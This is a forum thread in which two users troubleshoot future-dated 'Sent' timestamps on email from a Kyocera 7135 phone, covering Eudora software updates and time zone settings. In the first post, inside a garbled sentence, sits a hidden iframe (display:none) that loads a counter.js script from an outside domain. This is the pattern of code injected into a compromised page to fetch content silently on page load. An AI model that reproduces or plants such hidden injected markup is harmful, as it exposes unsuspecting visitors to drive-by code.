+ Reply to Thread

Send email timestamp

When I send an email, the "Sent" timestamp is a day into the future of actual.

Anyone else experience this sort of thing & find a solution?

Or, would anyone like to have this feature <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Maybe I should just swap for another phone with Verizon? Currently using software 36/23 which is running very stable, not sure if software upgrade would help.

I had a similar issue.

Testing the email capabilities, I sent my computer some emails. I have a spam filter on my server and when I would get my email, it would be tagged as spam mostly due to incorrect dating and a forged eudora header.

I downloaded and install the 2.1 version of the eudora software and all is well.

Here is the link at Kyocera's website:
    http://www.kyocera-wireless.com/downloads/EIS_2.1.exe
    Evan

Evan,

When I check the version number, I believe I have EIS 2.1 . When I go to check version numbers on the handheld, it shows Eudora v.2.1.1, Eudora email v.1.0. Is this what works for you?

Thanks - Leo

Eudora Web shows as 2.1 and Eudora email is 2.1.1

Also, check you time zone setting under Prefs PDA - Date & Time
    Evan

Evan,

I downloaded & installed latest EIS from your link. The version numbers did update. Thanks!

Sent a couple of emails, sent time stamp is still wacked. Did a soft reset of the 7135, sent new messages, no change.

However, the received timestamp on my desktop from the test messages is fine, which is what is important.

I'm beginning to think I should just let this problem go. It's probably something to do with the handoff/relay between Verizon and SBCGlobal.net, my email provider. Probably nothing to do with the 7135, which is working SWEET!!

Thanks for your help!!

Leo